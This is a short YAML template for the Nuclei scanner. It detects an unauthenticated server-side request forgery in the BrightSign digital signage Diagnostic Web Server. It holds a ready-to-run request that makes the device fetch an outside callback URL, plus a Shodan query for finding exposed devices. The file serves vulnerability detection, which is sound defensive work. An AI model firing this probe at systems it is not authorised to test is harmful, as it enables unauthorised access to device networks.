31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: brightsign-dsdws-ssrf
|
|
|
|
info:
|
|
name: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated - SSRF
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
|
|
reference:
|
|
- https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
|
|
- https://www.zeroscience.mk/codes/brightsign_ssrf.txt
|
|
metadata:
|
|
verified: true
|
|
shodan-query: title:"BrightSign"
|
|
tags: ssrf,brightsign,unauth
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/speedtest?url={{interactsh-url}}'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_1, "Downloaded")'
|